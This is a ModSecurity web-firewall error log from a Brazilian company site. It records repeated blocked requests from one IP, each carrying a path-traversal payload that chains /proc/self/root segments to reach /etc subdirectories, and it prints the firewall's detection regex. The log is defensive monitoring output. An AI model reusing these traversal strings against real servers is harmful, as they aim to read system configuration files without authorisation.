[Mon Mar 16 17:21:35.663986 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:58324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmT9SswJuvopo3lOh2WwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:38.223191 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:58336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmUdSswJuvopo3lOh2XAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:39.793992 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:47350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmU0r9dMAiw-8KANNesQAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:42.191010 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:47366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmVrysWC90G-1nBrBbnAAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:43.635183 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:47368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmV1ajLEzk2WiQ-10ptAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:45.199453 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:47380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmWc_BxrYCr4hPDw8BnQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:46.482130 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:47394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmWo6lpbStxTqkSkuBjgAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:47.900177 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:47398] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmW6TCbgAP5jq5TehDrAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:49.151504 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:44814] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmXY6lpbStxTqkSkuBkQAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:52.715671 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.241.46:44818] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmYKTCbgAP5jq5TehDsgAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:54.019376 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:44824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmYv9ocpUE4ed4uDwJ-wAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:55.422331 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:44832] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmY9SswJuvopo3lOh2YAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:56.644897 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:44846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmZNSswJuvopo3lOh2YQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:59.495369 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:44856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmZ7ABkC4fWIHEf8EMEAAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:01.162687 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:34852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmaY6lpbStxTqkSkuBlgAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:02.356422 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:34856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmarABkC4fWIHEf8EMEQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:03.699538 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.241.46:34868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhma0r9dMAiw-8KANNe1gAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:04.885231 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:34874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmbKTCbgAP5jq5TehDtAAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:08.394321 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:34890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmcNSswJuvopo3lOh2ZQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:09.844875 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:58070] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmcbABkC4fWIHEf8EMEwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:11.034395 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.241.46:58082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmc8_BxrYCr4hPDw8BpQAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
